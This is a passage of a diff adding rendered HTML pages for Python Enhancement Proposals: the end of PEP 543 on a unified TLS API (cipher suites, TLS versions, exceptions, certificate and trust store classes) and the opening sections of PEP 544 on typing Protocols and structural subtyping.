+    TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08c
+    TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08d
+    TLS_RSA_WITH_AES_128_CCM = 0xc09c
+    TLS_RSA_WITH_AES_256_CCM = 0xc09d
+    TLS_DHE_RSA_WITH_AES_128_CCM = 0xc09e
+    TLS_DHE_RSA_WITH_AES_256_CCM = 0xc09f
+    TLS_RSA_WITH_AES_128_CCM_8 = 0xc0a0
+    TLS_RSA_WITH_AES_256_CCM_8 = 0xc0a1
+    TLS_DHE_RSA_WITH_AES_128_CCM_8 = 0xc0a2
+    TLS_DHE_RSA_WITH_AES_256_CCM_8 = 0xc0a3
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM = 0xc0ac
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM = 0xc0ad
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 = 0xc0ae
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 = 0xc0af
+    TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca8
+    TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca9
+    TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xccaa
+
+
+

Enum members can be mapped to OpenSSL cipher names:

+
>>> import ssl
+>>> ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
+>>> ctx.set_ciphers('ALL:COMPLEMENTOFALL')
+>>> ciphers = {c['id'] & 0xffff: c['name'] for c in ctx.get_ciphers()}
+>>> ciphers[CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256]
+'ECDHE-RSA-AES128-GCM-SHA256'
+
+
+

For SecureTransport, these enum members directly refer to the values of the +cipher suite constants. For example, SecureTransport defines the cipher suite +enum member TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 as having the value +0xC02C. Not coincidentally, that is identical to its value in the above +enum. This makes mapping between SecureTransport and the above enum very easy +indeed.

+

For SChannel there is no easy direct mapping, due to the fact that SChannel +configures ciphers, instead of cipher suites. This represents an ongoing +concern with SChannel, which is that it is very difficult to configure in a +specific manner compared to other TLS implementations.

+

For the purposes of this PEP, any SChannel implementation will need to +determine which ciphers to choose based on the enum members. This may be more +open than the actual cipher suite list actually wants to allow, or it may be +more restrictive, depending on the choices of the implementation. This PEP +recommends that it be more restrictive, but of course this cannot be enforced.

+
+
+
+

Protocol Negotiation

+

Both NPN and ALPN allow for protocol negotiation as part of the HTTP/2 +handshake. While NPN and ALPN are, at their fundamental level, built on top of +bytestrings, string-based APIs are frequently problematic as they allow for +errors in typing that can be hard to detect.

+

For this reason, this module would define a type that protocol negotiation +implementations can pass and be passed. This type would wrap a bytestring to +allow for aliases for well-known protocols. This allows us to avoid the +problems inherent in typos for well-known protocols, while allowing the full +extensibility of the protocol negotiation layer if needed by letting users pass +byte strings directly.

+
class NextProtocol(Enum):
+    H2 = b'h2'
+    H2C = b'h2c'
+    HTTP1 = b'http/1.1'
+    WEBRTC = b'webrtc'
+    C_WEBRTC = b'c-webrtc'
+    FTP = b'ftp'
+    STUN = b'stun.nat-discovery'
+    TURN = b'stun.turn'
+
+
+
+
+

TLS Versions

+

It is often useful to be able to restrict the versions of TLS you’re willing to +support. There are many security advantages in refusing to use old versions of +TLS, and some misbehaving servers will mishandle TLS clients advertising +support for newer versions.

+

The following enumerated type can be used to gate TLS versions. Forward-looking +applications should almost never set a maximum TLS version unless they +absolutely must, as a TLS backend that is newer than the Python that uses it +may support TLS versions that are not in this enumerated type.

+

Additionally, this enumerated type defines two additional flags that can always +be used to request either the lowest or highest TLS version supported by an +implementation.

+
class TLSVersion(Enum):
+    MINIMUM_SUPPORTED = auto()
+    SSLv2 = auto()
+    SSLv3 = auto()
+    TLSv1 = auto()
+    TLSv1_1 = auto()
+    TLSv1_2 = auto()
+    TLSv1_3 = auto()
+    MAXIMUM_SUPPORTED = auto()
+
+
+
+
+

Errors

+

This module would define four base classes for use with error handling. Unlike +many of the other classes defined here, these classes are not abstract, as +they have no behaviour. They exist simply to signal certain common behaviours. +Backends should subclass these exceptions in their own packages, but needn’t +define any behaviour for them.

+

In general, concrete implementations should subclass these exceptions rather +than throw them directly. This makes it moderately easier to determine which +concrete TLS implementation is in use during debugging of unexpected errors. +However, this is not mandatory.

+

The definitions of the errors are below:

+
class TLSError(Exception):
+    """
+    The base exception for all TLS related errors from any backend.
+    Catching this error should be sufficient to catch *all* TLS errors,
+    regardless of what backend is used.
+    """
+
+class WantWriteError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or
+    buffer-only I/O is used. This error signals that the requested
+    operation cannot complete until more data is written to the network,
+    or until the output buffer is drained.
+
+    This error is should only be raised when it is completely impossible
+    to write any data. If a partial write is achievable then this should
+    not be raised.
+    """
+
+class WantReadError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or
+    buffer-only I/O is used. This error signals that the requested
+    operation cannot complete until more data is read from the network, or
+    until more data is available in the input buffer.
+
+    This error should only be raised when it is completely impossible to
+    write any data. If a partial write is achievable then this should not
+    be raised.
+    """
+
+class RaggedEOF(TLSError):
+    """
+    A special signaling exception used when a TLS connection has been
+    closed gracelessly: that is, when a TLS CloseNotify was not received
+    from the peer before the underlying TCP socket reached EOF. This is a
+    so-called "ragged EOF".
+
+    This exception is not guaranteed to be raised in the face of a ragged
+    EOF: some implementations may not be able to detect or report the
+    ragged EOF.
+
+    This exception is not always a problem. Ragged EOFs are a concern only
+    when protocols are vulnerable to length truncation attacks. Any
+    protocol that can detect length truncation attacks at the application
+    layer (e.g. HTTP/1.1 and HTTP/2) is not vulnerable to this kind of
+    attack and so can ignore this exception.
+    """
+
+
+
+
+

Certificates

+

This module would define an abstract X509 certificate class. This class would +have almost no behaviour, as the goal of this module is not to provide all +possible relevant cryptographic functionality that could be provided by X509 +certificates. Instead, all we need is the ability to signal the source of a +certificate to a concrete implementation.

+

For that reason, this certificate implementation defines only constructors. In +essence, the certificate object in this module could be as abstract as a handle +that can be used to locate a specific certificate.

+

Concrete implementations may choose to provide alternative constructors, e.g. +to load certificates from HSMs. If a common interface emerges for doing this, +this module may be updated to provide a standard constructor for this use-case +as well.

+

Concrete implementations should aim to have Certificate objects be hashable if +at all possible. This will help ensure that TLSConfiguration objects used with +an individual concrete implementation are also hashable.

+
class Certificate(metaclass=ABCMeta):
+    @abstractclassmethod
+    def from_buffer(cls, buffer: bytes):
+        """
+        Creates a Certificate object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN CERTIFICATE" and another
+        series of dashes). In the absence of that preamble, the
+        implementation may assume that the certificate is DER-encoded
+        instead.
+        """
+
+    @abstractclassmethod
+    def from_file(cls, path: Union[pathlib.Path, AnyStr]):
+        """
+        Creates a Certificate object from a file on disk. This method may
+        be a convenience method that wraps ``open`` and ``from_buffer``,
+        but some TLS implementations may be able to provide more-secure or
+        faster methods of loading certificates that do not involve Python
+        code.
+        """
+
+
+
+
+

Private Keys

+

This module would define an abstract private key class. Much like the +Certificate class, this class has almost no behaviour in order to give as much +freedom as possible to the concrete implementations to treat keys carefully.

+

This class has all the caveats of the Certificate class.

+
class PrivateKey(metaclass=ABCMeta):
+    @abstractclassmethod
+    def from_buffer(cls,
+                    buffer: bytes,
+                    password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
+        """
+        Creates a PrivateKey object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN", the key type, and
+        another series of dashes). In the absence of that preamble, the
+        implementation may assume that the certificate is DER-encoded
+        instead.
+
+        The key may additionally be encrypted. If it is, the ``password``
+        argument can be used to decrypt the key. The ``password`` argument
+        may be a function to call to get the password for decrypting the
+        private key. It will only be called if the private key is encrypted
+        and a password is necessary. It will be called with no arguments,
+        and it should return either bytes or bytearray containing the
+        password. Alternatively a bytes, or bytearray value may be supplied
+        directly as the password argument. It will be ignored if the
+        private key is not encrypted and no password is needed.
+        """
+
+    @abstractclassmethod
+    def from_file(cls,
+                  path: Union[pathlib.Path, bytes, str],
+                  password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
+        """
+        Creates a PrivateKey object from a file on disk. This method may
+        be a convenience method that wraps ``open`` and ``from_buffer``,
+        but some TLS implementations may be able to provide more-secure or
+        faster methods of loading certificates that do not involve Python
+        code.
+
+        The ``password`` parameter behaves exactly as the equivalent
+        parameter on ``from_buffer``.
+        """
+
+
+
+
+

Trust Store

+

As discussed above, loading a trust store represents an issue because different +TLS implementations vary wildly in how they allow users to select trust stores. +For this reason, we need to provide a model that assumes very little about the +form that trust stores take.

+

This problem is the same as the one that the Certificate and PrivateKey types +need to solve. For this reason, we use the exact same model, by creating an +opaque type that can encapsulate the various means that TLS backends may open +a trust store.

+

A given TLS implementation is not required to implement all of the +constructors. However, it is strongly recommended that a given TLS +implementation provide the system constructor if at all possible, as this +is the most common validation trust store that is used. Concrete +implementations may also add their own constructors.

+

Concrete implementations should aim to have TrustStore objects be hashable if +at all possible. This will help ensure that TLSConfiguration objects used with +an individual concrete implementation are also hashable.

+
class TrustStore(metaclass=ABCMeta):
+    @abstractclassmethod
+    def system(cls) -> TrustStore:
+        """
+        Returns a TrustStore object that represents the system trust
+        database.
+        """
+
+    @abstractclassmethod
+    def from_pem_file(cls, path: Union[pathlib.Path, bytes, str]) -> TrustStore:
+        """
+        Initializes a trust store from a single file full of PEMs.
+        """
+
+
+
+
+

Runtime Access

+

A not-uncommon use case for library users is to want to allow the library to +control the TLS configuration, but to want to select what backend is in use. +For example, users of Requests may want to be able to select between OpenSSL or +a platform-native solution on Windows and macOS, or between OpenSSL and NSS on +some Linux platforms. These users, however, may not care about exactly how +their TLS configuration is done.

+

This poses a problem: given an arbitrary concrete implementation, how can a +library work out how to load certificates into the trust store? There are two +options: either all concrete implementations can be required to fit into a +specific naming scheme, or we can provide an API that makes it possible to grab +these objects.

+

This PEP proposes that we use the second approach. This grants the greatest +freedom to concrete implementations to structure their code as they see fit, +requiring only that they provide a single object that has the appropriate +properties in place. Users can then pass this “backend” object to libraries +that support it, and those libraries can take care of configuring and using the +concrete implementation.

+

All concrete implementations must provide a method of obtaining a Backend +object. The Backend object can be a global singleton or can be created by a +callable if there is an advantage in doing that.

+

The Backend object has the following definition:

+
Backend = namedtuple(
+    'Backend',
+    ['client_context', 'server_context',
+     'certificate', 'private_key', 'trust_store']
+)
+
+
+

Each of the properties must provide the concrete implementation of the relevant +ABC. This ensures that code like this will work for any backend:

+
trust_store = backend.trust_store.system()
+
+
+
+
+
+
+

Changes to the Standard Library

+

The portions of the standard library that interact with TLS should be revised +to use these ABCs. This will allow them to function with other TLS backends. +This includes the following modules:

+
    +
  • asyncio
  • +
  • ftplib
  • +
  • http
  • +
  • imaplib
  • +
  • nntplib
  • +
  • poplib
  • +
  • smtplib
  • +
  • urllib
  • +
+
+

Migration of the ssl module

+

Naturally, we will need to extend the ssl module itself to conform to these +ABCs. This extension will take the form of new classes, potentially in an +entirely new module. This will allow applications that take advantage of the +current ssl module to continue to do so, while enabling the new APIs for +applications and libraries that want to use them.

+

In general, migrating from the ssl module to the new ABCs is not expected +to be one-to-one. This is normally acceptable: most tools that use the ssl +module hide it from the user, and so refactoring to use the new module should +be invisible.

+

However, a specific problem comes from libraries or applications that leak +exceptions from the ssl module, either as part of their defined API or by +accident (which is easily done). Users of those tools may have written code +that tolerates and handles exceptions from the ssl module being raised: +migrating to the ABCs presented here would potentially cause the exceptions +defined above to be thrown instead, and existing except blocks will not +catch them.

+

For this reason, part of the migration of the ssl module would require that +the exceptions in the ssl module alias those defined above. That is, they +would require the following statements to all succeed:

+
assert ssl.SSLError is tls.TLSError
+assert ssl.SSLWantReadError is tls.WantReadError
+assert ssl.SSLWantWriteError is tls.WantWriteError
+
+
+

The exact mechanics of how this will be done are beyond the scope of this PEP, +as they are made more complex due to the fact that the current ssl +exceptions are defined in C code, but more details can be found in +an email sent to the Security-SIG by Christian Heimes.

+
+
+
+

Future

+

Major future TLS features may require revisions of these ABCs. These revisions +should be made cautiously: many backends may not be able to move forward +swiftly, and will be invalidated by changes in these ABCs. This is acceptable, +but wherever possible features that are specific to individual implementations +should not be added to the ABCs. The ABCs should restrict themselves to +high-level descriptions of IETF-specified features.

+

However, well-justified extensions to this API absolutely should be made. The +focus of this API is to provide a unifying lowest-common-denominator +configuration option for the Python community. TLS is not a static target, and +as TLS evolves so must this API.

+
+
+

Credits

+

This document has received extensive review from a number of individuals in the +community who have substantially helped shape it. Detailed review was provided +by:

+
    +
  • Alex Chan
  • +
  • Alex Gaynor
  • +
  • Antoine Pitrou
  • +
  • Ashwini Oruganti
  • +
  • Donald Stufft
  • +
  • Ethan Furman
  • +
  • Glyph
  • +
  • Hynek Schlawack
  • +
  • Jim J Jewett
  • +
  • Nathaniel J. Smith
  • +
  • Alyssa Coghlan
  • +
  • Paul Kehrer
  • +
  • Steve Dower
  • +
  • Steven Fackler
  • +
  • Wes Turner
  • +
  • Will Bond
  • +
+

Further review was provided by the Security-SIG and python-ideas mailing lists.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0543.rst

+

Last modified: 2024-12-09 02:51:16 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0544/index.html b/pep-0544/index.html new file mode 100644 index 00000000000..5aec7630dca --- /dev/null +++ b/pep-0544/index.html @@ -0,0 +1,1630 @@ + + + + + + + + PEP 544 – Protocols: Structural subtyping (static duck typing) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 544 – Protocols: Structural subtyping (static duck typing)

+
+
Author:
+
Ivan Levkivskyi <levkivskyi at gmail.com>, Jukka Lehtosalo <jukka.lehtosalo at iki.fi>, Łukasz Langa <lukasz at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
05-Mar-2017
+
Python-Version:
+
3.8
+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Protocols and +typing.Protocol for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

Type hints introduced in PEP 484 can be used to specify type metadata +for static type checkers and other third party tools. However, PEP 484 +only specifies the semantics of nominal subtyping. In this PEP we specify +static and runtime semantics of protocol classes that will provide a support +for structural subtyping (static duck typing).

+
+
+

Rationale and Goals

+

Currently, PEP 484 and the typing module [typing] define abstract +base classes for several common Python protocols such as Iterable and +Sized. The problem with them is that a class has to be explicitly marked +to support them, which is unpythonic and unlike what one would +normally do in idiomatic dynamically typed Python code. For example, +this conforms to PEP 484:

+
from typing import Sized, Iterable, Iterator
+
+class Bucket(Sized, Iterable[int]):
+    ...
+    def __len__(self) -> int: ...
+    def __iter__(self) -> Iterator[int]: ...
+
+
+

The same problem appears with user-defined ABCs: they must be explicitly +subclassed or registered. This is particularly difficult to do with library +types as the type objects may be hidden deep in the implementation +of the library. Also, extensive use of ABCs might impose additional +runtime costs.

+

The intention of this PEP is to solve all these problems +by allowing users to write the above code without explicit base classes in +the class definition, allowing Bucket to be implicitly considered +a subtype of both Sized and Iterable[int] by static type checkers +using structural [wiki-structural] subtyping:

+
from typing import Iterator, Iterable
+
+class Bucket:
+    ...
+    def __len__(self) -> int: ...
+    def __iter__(self) -> Iterator[int]: ...
+
+def collect(items: Iterable[int]) -> int: ...
+result: int = collect(Bucket())  # Passes type check
+
+
+

Note that ABCs in typing module already provide structural behavior +at runtime, isinstance(Bucket(), Iterable) returns True. +The main goal of this proposal is to support such behavior statically. +The same functionality will be provided for user-defined protocols, as +specified below. The above code with a protocol class matches common Python +conventions much better. It is also automatically extensible and works +with additional, unrelated classes that happen to implement +the required protocol.

+
+

Nominal vs structural subtyping

+

Structural subtyping is natural for Python programmers since it matches +the runtime semantics of duck typing: an object that has certain properties +is treated independently of its actual runtime class. +However, as discussed in PEP 483, both nominal and structural +subtyping have their strengths and weaknesses. Therefore, in this PEP we +do not propose to replace the nominal subtyping described by PEP 484 with +structural subtyping completely. Instead, protocol classes as specified in +this PEP complement normal classes, and users are free to choose +where to apply a particular solution. See section on rejected ideas at the end of this PEP for additional motivation.

+
+
+

Non-goals

+

At runtime, protocol classes will be simple ABCs. There is no intent to +provide sophisticated runtime instance and class checks against protocol +classes. This would be difficult and error-prone and will contradict the logic +of PEP 484. As well, following PEP 484 and PEP 526 we state that protocols are +completely optional:

+
    +
  • No runtime semantics will be imposed for variables or parameters annotated +with a protocol class.
  • +
  • Any checks will be performed only by third-party type checkers and +other tools.
  • +
  • Programmers are free to not use them even if they use type annotations.
  • +
  • There is no intent to make protocols non-optional in the future.
  • +
+

To reiterate, providing complex runtime semantics for protocol classes +is not a goal of this PEP, the main goal is to provide a support and standards +for static structural subtyping. The possibility to use protocols +in the runtime context as ABCs is rather a minor bonus that exists mostly +to provide a seamless transition for projects that already use ABCs.

+
+
+
+

Existing Approaches to Structural Subtyping

+

Before describing the actual specification, we review and comment on existing +approaches related to structural subtyping in Python and other languages:

+
    +
  • zope.interface [zope-interfaces] was one of the first widely used +approaches to structural subtyping in Python. It is implemented by providing +special classes to distinguish interface classes from normal classes, +to mark interface attributes, and to explicitly declare implementation. +For example:
    from zope.interface import Interface, Attribute, implementer
    +
    +class IEmployee(Interface):
    +
    +    name = Attribute("Name of employee")
    +
    +    def do(work):
    +        """Do some work"""
    +
    +@implementer(IEmployee)
    +class Employee:
    +
    +    name = 'Anonymous'
    +
    +    def do(self, work):
    +        return work.start()
    +
    +
    +

    Zope interfaces support various contracts and constraints for interface +classes. For example:

    +
    from zope.interface import invariant
    +
    +def required_contact(obj):
    +    if not (obj.email or obj.phone):
    +        raise Exception("At least one contact info is required")
    +
    +class IPerson(Interface):
    +
    +    name = Attribute("Name")
    +    email = Attribute("Email Address")
    +    phone = Attribute("Phone Number")
    +
    +    invariant(required_contact)
    +
    +
    +

    Even more detailed invariants are supported. However, Zope interfaces rely +entirely on runtime validation. Such focus on runtime properties goes +beyond the scope of the current proposal, and static support for invariants +might be difficult to implement. However, the idea of marking an interface +class with a special base class is reasonable and easy to implement both +statically and at runtime.

    +
  • +
  • Python abstract base classes [abstract-classes] are the standard +library tool to provide some functionality similar to structural subtyping. +The drawback of this approach is the necessity to either subclass +the abstract class or register an implementation explicitly:
    from abc import ABC
    +
    +class MyTuple(ABC):
    +    pass
    +
    +MyTuple.register(tuple)
    +
    +assert issubclass(tuple, MyTuple)
    +assert isinstance((), MyTuple)
    +
    +
    +

    As mentioned in the rationale, +we want to avoid such necessity, especially in static context. +However, in a runtime context, ABCs are good candidates for +protocol classes and they are already used extensively in +the typing module.

    +
  • +
  • Abstract classes defined in collections.abc module [collections-abc] +are slightly more advanced since they implement a custom +__subclasshook__() method that allows runtime structural checks without +explicit registration:
    from collections.abc import Iterable
    +
    +class MyIterable:
    +    def __iter__(self):
    +        return []
    +
    +assert isinstance(MyIterable(), Iterable)
    +
    +
    +

    Such behavior seems to be a perfect fit for both runtime and static behavior +of protocols. As discussed in rationale, +we propose to add static support for such behavior. +In addition, to allow users to achieve such runtime +behavior for user-defined protocols a special @runtime_checkable decorator +will be provided, see detailed discussion below.

    +
  • +
  • TypeScript [typescript] provides support for user-defined classes and +interfaces. Explicit implementation declaration is not required and +structural subtyping is verified statically. For example:
    interface LabeledItem {
    +    label: string;
    +    size?: int;
    +}
    +
    +function printLabel(obj: LabeledItem) {
    +    console.log(obj.label);
    +}
    +
    +let myObj = {size: 10, label: "Size 10 Object"};
    +printLabel(myObj);
    +
    +
    +

    Note that optional interface members are supported. Also, TypeScript +prohibits redundant members in implementations. While the idea of +optional members looks interesting, it would complicate this proposal and +it is not clear how useful it will be. Therefore, it is proposed to postpone +this; see rejected ideas. In general, the idea of +static protocol checking without runtime implications looks reasonable, +and basically this proposal follows the same line.

    +
  • +
  • Go [golang] uses a more radical approach and makes interfaces the primary +way to provide type information. Also, assignments are used to explicitly +ensure implementation:
    type SomeInterface interface {
    +    SomeMethod() ([]byte, error)
    +}
    +
    +if _, ok := someval.(SomeInterface); ok {
    +    fmt.Printf("value implements some interface")
    +}
    +
    +
    +

    Both these ideas are questionable in the context of this proposal. See +the section on rejected ideas.

    +
  • +
+
+
+

Specification

+
+

Terminology

+

We propose to use the term protocols for types supporting structural +subtyping. The reason is that the term iterator protocol, +for example, is widely understood in the community, and coming up with +a new term for this concept in a statically typed context would just create +confusion.

+

This has the drawback that the term protocol becomes overloaded with +two subtly different meanings: the first is the traditional, well-known but +slightly fuzzy concept of protocols such as iterator; the second is the more +explicitly defined concept of protocols in statically typed code. +The distinction is not important most of the time, and in other +cases we propose to just add a qualifier such as protocol classes +when referring to the static type concept.

+

If a class includes a protocol in its MRO, the class is called +an explicit subclass of the protocol. If a class is a structural subtype +of a protocol, it is said to implement the protocol and to be compatible +with a protocol. If a class is compatible with a protocol but the protocol +is not included in the MRO, the class is an implicit subtype +of the protocol. (Note that one can explicitly subclass a protocol and +still not implement it if a protocol attribute is set to None +in the subclass, see Python [data-model] for details.)

+

The attributes (variables and methods) of a protocol that are mandatory +for other class in order to be considered a structural subtype are called +protocol members.

+
+
+

Defining a protocol

+

Protocols are defined by including a special new class typing.Protocol +(an instance of abc.ABCMeta) in the base classes list, typically +at the end of the list. Here is a simple example:

+
from typing import Protocol
+
+class SupportsClose(Protocol):
+    def close(self) -> None:
+        ...
+
+
+

Now if one defines a class Resource with a close() method that has +a compatible signature, it would implicitly be a subtype of +SupportsClose, since the structural subtyping is used for +protocol types:

+
class Resource:
+    ...
+    def close(self) -> None:
+        self.file.close()
+        self.lock.release()
+
+
+

Apart from few restrictions explicitly mentioned below, protocol types can +be used in every context where a normal types can:

+
def close_all(things: Iterable[SupportsClose]) -> None:
+    for t in things:
+        t.close()
+
+f = open('foo.txt')
+r = Resource()
+close_all([f, r])  # OK!
+close_all([1])     # Error: 'int' has no 'close' method
+
+
+

Note that both the user-defined class Resource and the built-in +IO type (the return type of open()) are considered subtypes of +SupportsClose, because they provide a close() method with +a compatible type signature.

+
+
+

Protocol members

+

All methods defined in the protocol class body are protocol members, both +normal and decorated with @abstractmethod. If any parameters of a +protocol method are not annotated, then their types are assumed to be Any +(see PEP 484). Bodies of protocol methods are type checked. +An abstract method that should not be called via super() ought to raise +NotImplementedError. Example:

+
from typing import Protocol
+from abc import abstractmethod
+
+class Example(Protocol):
+    def first(self) -> int:     # This is a protocol member
+        return 42
+
+    @abstractmethod
+    def second(self) -> int:    # Method without a default implementation
+        raise NotImplementedError
+
+
+

Static methods, class methods, and properties are equally allowed +in protocols.

+

To define a protocol variable, one can use PEP 526 variable +annotations in the class body. Additional attributes only defined in +the body of a method by assignment via self are not allowed. The rationale +for this is that the protocol class implementation is often not shared by +subtypes, so the interface should not depend on the default implementation. +Examples:

+
from typing import Protocol, List
+
+class Template(Protocol):
+    name: str        # This is a protocol member
+    value: int = 0   # This one too (with default)
+
+    def method(self) -> None:
+        self.temp: List[int] = [] # Error in type checker
+
+class Concrete:
+    def __init__(self, name: str, value: int) -> None:
+        self.name = name
+        self.value = value
+
+    def method(self) -> None:
+        return
+
+var: Template = Concrete('value', 42)  # OK
+
+
+

To distinguish between protocol class variables and protocol instance +variables, the special ClassVar annotation should be used as specified +by PEP 526. By default, protocol variables as defined above are considered +readable and writable. To define a read-only protocol variable, one can use +an (abstract) property.

+
+
+

Explicitly declaring implementation

+

To explicitly declare that a certain class implements a given protocol, +it can be used as a regular base class. In this case a class could use +default implementations of protocol members. Static analysis tools are +expected to automatically detect that a class implements a given protocol. +So while it’s possible to subclass a protocol explicitly, it’s not necessary +to do so for the sake of type-checking.

+

The default implementations cannot be used if +the subtype relationship is implicit and only via structural +subtyping – the semantics of inheritance is not changed. Examples:

+
class PColor(Protocol):
+    @abstractmethod
+    def draw(self) -> str:
+        ...
+    def complex_method(self) -> int:
+        # some complex code here
+        ...
+
+class NiceColor(PColor):
+    def draw(self) -> str:
+        return "deep blue"
+
+class BadColor(PColor):
+    def draw(self) -> str:
+        return super().draw()  # Error, no default implementation
+
+class ImplicitColor:   # Note no 'PColor' base here
+    def draw(self) -> str:
+        return "probably gray"
+    def complex_method(self) -> int:
+        # class needs to implement this
+        ...
+
+nice: NiceColor
+another: ImplicitColor
+
+def represent(c: PColor) -> None:
+    print(c.draw(), c.complex_method())
+
+represent(nice) # OK
+represent(another) # Also OK
+
+
+

Note that there is little difference between explicit and implicit +subtypes, the main benefit of explicit subclassing is to get some protocol +methods “for free”. In addition, type checkers can statically verify that +the class actually implements the protocol correctly:

+
class RGB(Protocol):
+    rgb: Tuple[int, int, int]
+
+    @abstractmethod
+    def intensity(self) -> int:
+        return 0
+
+class Point(RGB):
+    def __init__(self, red: int, green: int, blue: str) -> None:
+        self.rgb = red, green, blue  # Error, 'blue' must be 'int'
+
+    # Type checker might warn that 'intensity' is not defined
+
+
+

A class can explicitly inherit from multiple protocols and also from normal +classes. In this case methods are resolved using normal MRO and a type checker +verifies that all subtyping are correct. The semantics of @abstractmethod +is not changed, all of them must be implemented by an explicit subclass +before it can be instantiated.

+
+
+

Merging and extending protocols

+

The general philosophy is that protocols are mostly like regular ABCs, +but a static type checker will handle them specially. Subclassing a protocol +class would not turn the subclass into a protocol unless it also has +typing.Protocol as an explicit base class. Without this base, the class +is “downgraded” to a regular ABC that cannot be used with structural +subtyping. The rationale for this rule is that we don’t want to accidentally +have some class act as a protocol just because one of its base classes +happens to be one. We still slightly prefer nominal subtyping over structural +subtyping in the static typing world.

+

A subprotocol can be defined by having both one or more protocols as +immediate base classes and also having typing.Protocol as an immediate +base class:

+
from typing import Sized, Protocol
+
+class SizedAndClosable(Sized, Protocol):
+    def close(self) -> None:
+        ...
+
+
+

Now the protocol SizedAndClosable is a protocol with two methods, +__len__ and close. If one omits Protocol in the base class list, +this would be a regular (non-protocol) class that must implement Sized. +Alternatively, one can implement SizedAndClosable protocol by merging +the SupportsClose protocol from the example in the definition section +with typing.Sized:

+
from typing import Sized
+
+class SupportsClose(Protocol):
+    def close(self) -> None:
+        ...
+
+class SizedAndClosable(Sized, SupportsClose, Protocol):
+    pass
+
+
+

The two definitions of SizedAndClosable are equivalent. +Subclass relationships between protocols are not meaningful when +considering subtyping, since structural compatibility is +the criterion, not the MRO.

+

If Protocol is included in the base class list, all the other base classes +must be protocols. A protocol can’t extend a regular class, see rejected ideas for rationale. +Note that rules around explicit subclassing are different +from regular ABCs, where abstractness is simply defined by having at least one +abstract method being unimplemented. Protocol classes must be marked +explicitly.

+
+
+

Generic protocols

+

Generic protocols are important. For example, SupportsAbs, Iterable +and Iterator are generic protocols. They are defined similar to normal +non-protocol generic types:

+
class Iterable(Protocol[T]):
+    @abstractmethod
+    def __iter__(self) -> Iterator[T]:
+        ...
+
+
+

Protocol[T, S, ...] is allowed as a shorthand for +Protocol, Generic[T, S, ...].

+

User-defined generic protocols support explicitly declared variance. +Type checkers will warn if the inferred variance is different from +the declared variance. Examples:

+
T = TypeVar('T')
+T_co = TypeVar('T_co', covariant=True)
+T_contra = TypeVar('T_contra', contravariant=True)
+
+class Box(Protocol[T_co]):
+    def content(self) -> T_co:
+        ...
+
+box: Box[float]
+second_box: Box[int]
+box = second_box  # This is OK due to the covariance of 'Box'.
+
+class Sender(Protocol[T_contra]):
+    def send(self, data: T_contra) -> int:
+        ...
+
+sender: Sender[float]
+new_sender: Sender[int]
+new_sender = sender  # OK, 'Sender' is contravariant.
+
+class Proto(Protocol[T]):
+    attr: T  # this class is invariant, since it has a mutable attribute
+
+var: Proto[float]
+another_var: Proto[int]
+var = another_var  # Error! 'Proto[float]' is incompatible with 'Proto[int]'.
+
+
+

Note that unlike nominal classes, de facto covariant protocols cannot be +declared as invariant, since this can break transitivity of subtyping +(see rejected ideas for details). For example:

+
T = TypeVar('T')
+
+class AnotherBox(Protocol[T]):  # Error, this protocol is covariant in T,
+    def content(self) -> T:     # not invariant.
+        ...
+
+
+
+
+

Recursive protocols

+

Recursive protocols are also supported. Forward references to the protocol +class names can be given as strings as specified by PEP 484. Recursive +protocols are useful for representing self-referential data structures +like trees in an abstract fashion:

+
class Traversable(Protocol):
+    def leaves(self) -> Iterable['Traversable']:
+        ...
+
+
+

Note that for recursive protocols, a class is considered a subtype of +the protocol in situations where the decision depends on itself. +Continuing the previous example:

+
class SimpleTree:
+    def leaves(self) -> List['SimpleTree']:
+        ...
+
+root: Traversable = SimpleTree()  # OK
+
+class Tree(Generic[T]):
+    def leaves(self) -> List['Tree[T]']:
+        ...
+
+def walk(graph: Traversable) -> None:
+    ...
+tree: Tree[float] = Tree()
+walk(tree)  # OK, 'Tree[float]' is a subtype of 'Traversable'
+
+
+
+
+

Self-types in protocols

+

The self-types in protocols follow the +corresponding specification +of PEP 484. For example:

+
C = TypeVar('C', bound='Copyable')
+class Copyable(Protocol):
+    def copy(self: C) -> C:
+
+class One:
+    def copy(self) -> 'One':
+        ...
+
+T = TypeVar('T', bound='Other')
+class Other:
+    def copy(self: T) -> T:
+        ...
+
+c: Copyable
+c = One()  # OK
